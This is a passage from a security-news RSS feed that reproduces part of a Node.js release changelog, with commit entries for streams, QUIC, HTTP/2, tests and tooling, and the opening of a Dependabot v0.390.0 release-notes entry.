<li>[<a href="https://github.com/nodejs/node/commit/4a3ef5b2b5"><code>4a3ef5b2b5</code></a>] - <strong>fs</strong>: add pattern cache for matchGlobPattern() (bq) <a href="https://github.com/nodejs/node/pull/63915" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63915/hovercard">#63915</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce113efcac"><code>ce113efcac</code></a>] - <strong>fs</strong>: fix cp symlink and EEXIST handling on Windows (Kirill Saied) <a href="https://github.com/nodejs/node/pull/64353" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64353/hovercard">#64353</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3be3041ac9"><code>3be3041ac9</code></a>] - <strong>http</strong>: fix perf_hooks detail.req.url port and proxied path (Stefano Baghino) <a href="https://github.com/nodejs/node/pull/64311" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64311/hovercard">#64311</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0047ad73cf"><code>0047ad73cf</code></a>] - <strong>http</strong>: remove unused n arg from IncomingMessage._read (Efe Karasakal) <a href="https://github.com/nodejs/node/pull/64370" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64370/hovercard">#64370</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4d48984d5c"><code>4d48984d5c</code></a>] - <strong>http2</strong>: don't throw when destroying socket proxy (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64427" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64427/hovercard">#64427</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3329647762"><code>3329647762</code></a>] - <strong>http2</strong>: avoid copying the options in respond() (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64265" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64265/hovercard">#64265</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a44fca5e24"><code>a44fca5e24</code></a>] - <strong>http2</strong>: avoid per-write closures in kWriteGeneric (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64265" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64265/hovercard">#64265</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/546e0e70a1"><code>546e0e70a1</code></a>] - <strong>inspector</strong>: add --cond to node inspect probe mode (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/64328" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64328/hovercard">#64328</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b38a39dd96"><code>b38a39dd96</code></a>] - <strong>lib</strong>: use <code>assignFunctionName</code> util where it makes sense (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64515" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64515/hovercard">#64515</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f60a12b94f"><code>f60a12b94f</code></a>] - <strong>lib,tools</strong>: add <code>node-core/func-name-matching</code> lint rule (Livia Medeiros) <a href="https://github.com/nodejs/node/pull/57901" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/57901/hovercard">#57901</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9e6e9d4745"><code>9e6e9d4745</code></a>] - <strong>meta</strong>: lower stale to 3 months (Aviv Keller) <a href="https://github.com/nodejs/node/pull/64569" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64569/hovercard">#64569</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3dd11c4993"><code>3dd11c4993</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64315" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64315/hovercard">#64315</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f55208104"><code>3f55208104</code></a>] - <strong>module</strong>: add two tests for eager imports when using <code>import defer</code> (Maya Lekova) <a href="https://github.com/nodejs/node/pull/64197" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64197/hovercard">#64197</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c791eedc9d"><code>c791eedc9d</code></a>] - <strong>net</strong>: support sync connect for BoundSocket (Guy Bedford) <a href="https://github.com/nodejs/node/pull/64375" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64375/hovercard">#64375</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4df4a3fc61"><code>4df4a3fc61</code></a>] - <strong>net</strong>: make TCP Server and Socket transferable across worker threads (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64225" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64225/hovercard">#64225</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5dd34d7d06"><code>5dd34d7d06</code></a>] - <strong>path</strong>: add benchmarks for path.matchesGlob() (bq) <a href="https://github.com/nodejs/node/pull/63915" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63915/hovercard">#63915</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8e520646b6"><code>8e520646b6</code></a>] - <strong>quic</strong>: defer server session emit until TLS ClientHello is processed (Tim Perry) <a href="https://github.com/nodejs/node/pull/64132" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64132/hovercard">#64132</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b8cc9a3fb"><code>4b8cc9a3fb</code></a>] - <strong>quic</strong>: preserve session stats after close (한만욱) <a href="https://github.com/nodejs/node/pull/64489" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64489/hovercard">#64489</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/591090ca85"><code>591090ca85</code></a>] - <strong>quic</strong>: add support for TLS certificate compression (Sebastian Beltran) <a href="https://github.com/nodejs/node/pull/64434" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64434/hovercard">#64434</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d636c9c30f"><code>d636c9c30f</code></a>] - <strong>quic</strong>: extract transport logic from Application to Session (Tim Perry) <a href="https://github.com/nodejs/node/pull/64127" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64127/hovercard">#64127</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/abb62f961f"><code>abb62f961f</code></a>] - <strong>quic</strong>: correct http3 callback and fix revealed errs (Marten Richter) <a href="https://github.com/nodejs/node/pull/64289" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64289/hovercard">#64289</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5f535fdbe8"><code>5f535fdbe8</code></a>] - <strong>quic</strong>: fix no onstream handler crash quic (Efe) <a href="https://github.com/nodejs/node/pull/64158" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64158/hovercard">#64158</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/933e5f14b5"><code>933e5f14b5</code></a>] - <strong>quic</strong>: fix stall datagrams, if no pending streams (Marten Richter) <a href="https://github.com/nodejs/node/pull/64303" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64303/hovercard">#64303</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/272632a57f"><code>272632a57f</code></a>] - <strong>quic</strong>: fix potential crash from unobserved closed (Tim Perry) <a href="https://github.com/nodejs/node/pull/64134" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64134/hovercard">#64134</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2d5f445489"><code>2d5f445489</code></a>] - <strong>sqlite</strong>: read column count after step in StatementSync.all() (Guilherme Araújo) <a href="https://github.com/nodejs/node/pull/64219" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64219/hovercard">#64219</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/54929af44e"><code>54929af44e</code></a>] - <strong>src</strong>: avoid redundant KEM encapsulation copies (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64553" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64553/hovercard">#64553</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5380bf28b3"><code>5380bf28b3</code></a>] - <strong>src</strong>: avoid redundant DataPointer reallocations (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64552" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64552/hovercard">#64552</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6ff5a1b834"><code>6ff5a1b834</code></a>] - <strong>src</strong>: fix comment typos (Jungwon Sohn) <a href="https://github.com/nodejs/node/pull/64509" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64509/hovercard">#64509</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/508ec0e435"><code>508ec0e435</code></a>] - <strong>src</strong>: zero-initialize cap_data in node_credentials.cc (Samuel Kapust) <a href="https://github.com/nodejs/node/pull/64347" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64347/hovercard">#64347</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c5090a36c1"><code>c5090a36c1</code></a>] - <strong>src</strong>: fix some typo errors and rename some variables (Archkon) <a href="https://github.com/nodejs/node/pull/64301" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64301/hovercard">#64301</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0a89bef69e"><code>0a89bef69e</code></a>] - <strong>src,permission</strong>: do not throw on denied access in audit mode (Adrián Estrada) <a href="https://github.com/nodejs/node/pull/64426" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64426/hovercard">#64426</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/63e71195c5"><code>63e71195c5</code></a>] - <strong>stream</strong>: abort pending single-source merge reads (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64445" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64445/hovercard">#64445</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f403b30c3d"><code>f403b30c3d</code></a>] - <strong>stream</strong>: use RangeError for broadcast overflow (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64420" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64420/hovercard">#64420</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5c0578cbf7"><code>5c0578cbf7</code></a>] - <strong>stream</strong>: skip null output from stateful transforms (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64462" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64462/hovercard">#64462</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0488d02d5d"><code>0488d02d5d</code></a>] - <strong>stream</strong>: update iterable streams to use budget backpressure (James M Snell) <a href="https://github.com/nodejs/node/pull/64464" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64464/hovercard">#64464</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f0811baeef"><code>f0811baeef</code></a>] - <strong>stream</strong>: remove custom <code>CloneableDOMException</code> implementation (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64469" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64469/hovercard">#64469</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/10f3f9682e"><code>10f3f9682e</code></a>] - <strong>stream</strong>: fix drop-newest behavior in share() (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64417" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64417/hovercard">#64417</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2aad973b29"><code>2aad973b29</code></a>] - <strong>stream</strong>: resume flow when an errored pipe destination is removed (Mahin Anowar) <a href="https://github.com/nodejs/node/pull/64310" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64310/hovercard">#64310</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6112ed5ceb"><code>6112ed5ceb</code></a>] - <strong>stream</strong>: fold desired-size check into WHATWG backpressure update (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64451" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64451/hovercard">#64451</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d829aa1138"><code>d829aa1138</code></a>] - <strong>stream</strong>: validate writer options signal (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64385" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64385/hovercard">#64385</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8e7a5e940e"><code>8e7a5e940e</code></a>] - <strong>stream</strong>: reject push iterator.throw() with error (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64380" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64380/hovercard">#64380</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4390f81294"><code>4390f81294</code></a>] - <strong>stream</strong>: simplify nested <code>PromisePrototypeThen</code>s (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64470" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64470/hovercard">#64470</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ddf2c38e9d"><code>ddf2c38e9d</code></a>] - <strong>stream</strong>: use the ring buffer for WHATWG stream request queues (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64431" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64431/hovercard">#64431</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/518d81b36d"><code>518d81b36d</code></a>] - <strong>stream</strong>: validate writevSync chunks before queuing (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64300" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64300/hovercard">#64300</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f745c4261d"><code>f745c4261d</code></a>] - <strong>stream</strong>: speed up reads and iteration over default WHATWG streams (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64320" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64320/hovercard">#64320</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4f4bce62fe"><code>4f4bce62fe</code></a>] - <strong>stream</strong>: copy SAB-backed chunks in iter consumers (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64382" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64382/hovercard">#64382</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f29937d26f"><code>f29937d26f</code></a>] - <strong>stream</strong>: reject nested async streamables in from() (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64352" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64352/hovercard">#64352</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/424cec71b7"><code>424cec71b7</code></a>] - <strong>stream</strong>: avoid draining merged iter sources (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64293" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64293/hovercard">#64293</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e01906180c"><code>e01906180c</code></a>] - <strong>stream</strong>: use ring buffer for WHATWG stream queues (Yagiz Nizipli) <a href="https://github.com/nodejs/node/pull/64312" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64312/hovercard">#64312</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0a0193f666"><code>0a0193f666</code></a>] - <strong>stream</strong>: hoist repeated loads in readable paths (Yagiz Nizipli) <a href="https://github.com/nodejs/node/pull/64312" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64312/hovercard">#64312</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ebe16003b6"><code>ebe16003b6</code></a>] - <strong>stream</strong>: prefer sync iterator in fromSync (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64294" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64294/hovercard">#64294</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f249614835"><code>f249614835</code></a>] - <strong>stream</strong>: speed up async iteration over WHATWG byte streams (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64291" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64291/hovercard">#64291</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7331118699"><code>7331118699</code></a>] - <strong>stream, quic</strong>: update iterable streams backpressure (James M Snell) <a href="https://github.com/nodejs/node/pull/64464" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64464/hovercard">#64464</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/46b117729d"><code>46b117729d</code></a>] - <strong>test</strong>: update quic tests for stream/iter update (James M Snell) <a href="https://github.com/nodejs/node/pull/64464" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64464/hovercard">#64464</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b122ca5389"><code>b122ca5389</code></a>] - <strong>test</strong>: fix flaky http2 socket proxy test (Tim Perry) <a href="https://github.com/nodejs/node/pull/64673" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64673/hovercard">#64673</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/68c46146fd"><code>68c46146fd</code></a>] - <strong>test</strong>: apply correction to comment (Rich Trott) <a href="https://github.com/nodejs/node/pull/64524" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64524/hovercard">#64524</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d7e119b26b"><code>d7e119b26b</code></a>] - <strong>test</strong>: keep finalization before-exit ref alive (Tim Perry) <a href="https://github.com/nodejs/node/pull/64521" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64521/hovercard">#64521</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0db4e10a0c"><code>0db4e10a0c</code></a>] - <strong>test</strong>: copyedit <code>test-tls-psk-alpn-callback-exception-handling</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63485" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63485/hovercard">#63485</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/21389f7b25"><code>21389f7b25</code></a>] - <strong>test</strong>: fix stale async-context-frame status entries (Kirill Saied) <a href="https://github.com/nodejs/node/pull/64141" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64141/hovercard">#64141</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/af55304846"><code>af55304846</code></a>] - <strong>test</strong>: update WPT for urlpattern to 5847ee5cfa (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64436" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64436/hovercard">#64436</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/43a5ce4e00"><code>43a5ce4e00</code></a>] - <strong>test</strong>: update WPT for WebCryptoAPI to ec2fee39a4 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64435" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64435/hovercard">#64435</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11ca52a521"><code>11ca52a521</code></a>] - <strong>test</strong>: fix flaky http2 maxOriginSetSize test (Tim Perry) <a href="https://github.com/nodejs/node/pull/64407" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64407/hovercard">#64407</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/af08a11e77"><code>af08a11e77</code></a>] - <strong>test</strong>: fix 2nd flaky blob test case (Tim Perry) <a href="https://github.com/nodejs/node/pull/64391" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64391/hovercard">#64391</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0104ae1171"><code>0104ae1171</code></a>] - <strong>test</strong>: fix flaky watch + cwd + argv test-runner test (Tim Perry) <a href="https://github.com/nodejs/node/pull/64372" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64372/hovercard">#64372</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b3ff5fe3f4"><code>b3ff5fe3f4</code></a>] - <strong>test</strong>: normalize Windows crash in debugger test normalization (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/64332" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64332/hovercard">#64332</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4cdceb7436"><code>4cdceb7436</code></a>] - <strong>test</strong>: unmark flaky http2-large-file for Win (Kirill Saied) <a href="https://github.com/nodejs/node/pull/64255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64255/hovercard">#64255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/19f529377b"><code>19f529377b</code></a>] - <strong>test</strong>: unmark flaky SEA snapshot tests on Windows (Kirill Saied) <a href="https://github.com/nodejs/node/pull/64317" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64317/hovercard">#64317</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/66f9b342ef"><code>66f9b342ef</code></a>] - <strong>test</strong>: increase timeout in consumed-timeout test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64204" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64204/hovercard">#64204</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fdbbf0ae6d"><code>fdbbf0ae6d</code></a>] - <strong>test</strong>: handle null stdio streams in spawnSyncAndAssert helper (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/64273" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64273/hovercard">#64273</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/10ea17dafe"><code>10ea17dafe</code></a>] - <strong>test</strong>: remove impact of tier-up changes in worker stack size test (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/64271" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64271/hovercard">#64271</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb51f2c960"><code>bb51f2c960</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>test_runner</strong>: add context.log() and test:log event (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/64389" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64389/hovercard">#64389</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/56ce83b3ee"><code>56ce83b3ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>test_runner</strong>: report <code>entryFile</code> in <code>TestStream</code> events (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/64309" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64309/hovercard">#64309</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7a02e4f9e6"><code>7a02e4f9e6</code></a>] - <strong>timers</strong>: do not retain a reference to the async store after firing (Matteo Collina) <a href="https://github.com/nodejs/node/pull/53443" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/53443/hovercard">#53443</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d5d46ef00"><code>7d5d46ef00</code></a>] - <strong>tls</strong>: match IPv6 hosts against IP-Address SANs (Pascal Garber) <a href="https://github.com/nodejs/node/pull/64145" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64145/hovercard">#64145</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f7bc0c62df"><code>f7bc0c62df</code></a>] - <strong>tools</strong>: bump brace-expansion from 5.0.6 to 5.0.7 in /tools/eslint (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64636" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64636/hovercard">#64636</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f80ed2e93"><code>3f80ed2e93</code></a>] - <strong>tools</strong>: reference 'git node land' in PR-URL: error message in merge.sh (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/64495" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64495/hovercard">#64495</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7b373cafce"><code>7b373cafce</code></a>] - <strong>tools</strong>: disable zipping tarballs on GHA (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64423" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64423/hovercard">#64423</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5bdbd256e9"><code>5bdbd256e9</code></a>] - <strong>tools</strong>: add workflow to compare Nix changes (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64410" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64410/hovercard">#64410</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ca4a16634b"><code>ca4a16634b</code></a>] - <strong>tools</strong>: add option for <code>benchmark.yml</code> to post comment on PR (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64395" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64395/hovercard">#64395</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/86193ef193"><code>86193ef193</code></a>] - <strong>tools</strong>: fix redundant conditions in v8.gyp for riscv64 and loong64 (Jamie Magee) <a href="https://github.com/nodejs/node/pull/62608" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62608/hovercard">#62608</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ee460404be"><code>ee460404be</code></a>] - <strong>util</strong>: make MIMEParams accessors case-insensitive (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/64123" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64123/hovercard">#64123</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a63ee46ddd"><code>a63ee46ddd</code></a>] - <strong>vfs</strong>: make recursive readdir iterative (AkshatOP) <a href="https://github.com/nodejs/node/pull/64149" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64149/hovercard">#64149</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/37f93c3b15"><code>37f93c3b15</code></a>] - <strong>vfs</strong>: make lchmod update symlink mode (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64350" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64350/hovercard">#64350</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce54e2a9c8"><code>ce54e2a9c8</code></a>] - <strong>vfs</strong>: fix VirtualReadStream race with async iteration (Y1D7NG) <a href="https://github.com/nodejs/node/pull/64394" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64394/hovercard">#64394</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/54e8d3a14b"><code>54e8d3a14b</code></a>] - <strong>vfs</strong>: follow symlinked dirs in recursive mkdir (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64287" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64287/hovercard">#64287</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7be42b64e1"><code>7be42b64e1</code></a>] - <strong>vm</strong>: enable interception on global restricted properties (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64202" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64202/hovercard">#64202</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c2cfcf8e7d"><code>c2cfcf8e7d</code></a>] - <strong>zlib</strong>: reject truncated zstd input (Archkon) <a href="https://github.com/nodejs/node/pull/64593" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64593/hovercard">#64593</a></li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: v0.390.0]]></title>
<description><![CDATA[What's Changed

Add typed requirement source API by @JamieMagee in #15705
Reland "Cargo: handle crates locked at multiple versions" (#15638) by @p-linnane in #15668
Preserve original absence of the bundler self-checksum on lockfile updates by @p-linnane in #15669
Support security updates for vcpk...]]></description>
<link>https://tsecurity.de/de/3701343/it-security-tools/github-v03900/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701343/it-security-tools/github-v03900/</guid>
<pubDate>Mon, 03 Aug 2026 20:19:59 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h2>What's Changed</h2>
<ul>
<li>Add typed requirement source API by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4996466704" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15705" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15705/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15705">#15705</a></li>
<li>Reland "Cargo: handle crates locked at multiple versions" (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4935440107" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15638" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15638/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15638">#15638</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p-linnane/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p-linnane">@p-linnane</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4964095749" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15668" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15668/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15668">#15668</a></li>
